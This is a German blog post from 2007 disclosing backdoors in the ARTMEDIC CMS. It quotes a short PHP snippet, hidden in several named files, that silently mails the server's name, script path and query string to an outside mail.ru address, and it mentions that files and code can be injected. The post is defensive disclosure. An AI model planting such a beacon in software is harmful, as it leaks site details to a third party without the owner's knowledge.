Sicherheitsmeldungen

Um am Markt einen wirklichen Vergleich finden zu können, untersuchen ich mit einem kleinen Team von Programmierern immer wieder einige CMS auf Funktionalität etc. Bei unserem letzten Test haben wir dabei eine große Sicherheitslücke im *ARTMEDIC CMS* gefunden.

Mindestens 2 Backdoors sind enthalten, über die es möglich wird, Code auf dem Server auszuführen und diesen eventuell als Spam-Relay oder zu anderen Zwecken zu missbrauchen.

Beim Drucken, Installieren und noch anderen Funktionen wird in der aktuellen Version ein Skript aufgerufen, das folgenden Code enthält:

$to = “anonymous108@mail.ru”;
$script =
$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'].’?’.$_SERVER['QUERY_STRING'];
@mail($to,$script,0);

Vor allem sind betroffen die Files cms_bildbearbeitung.php, cms_html2.php, cms_setup.php, print.php

Über das CMS kann eine Datei auf Ihren Server übertragen werden, schadhafter Code eingeführt werden.

Das CMS wird von derzeit ca. 500 Benutzern eingesetzt. Das CMS ist bereits früher mit Sicherheitslücken auffällig geworden:

Vgl. http://www.securityfocus.com/archive/1/432397

Und die Moral von der Geschicht?
Drum prüfe, wer sich ewig bindet.

Nachtrag: 18.6.2007

Eine Woche nach unserer Meldung an Artmedic und einen Tag nach meinem Blogeintrag empfiehlt Heise Security, Websites mit Artmedic vom Netz zu nehmen:

http://www.heise.de/newsticker/meldung/89825

No related posts.

Ähnliche Artikel bereitgestellt von Yet Another Related Posts Plugin.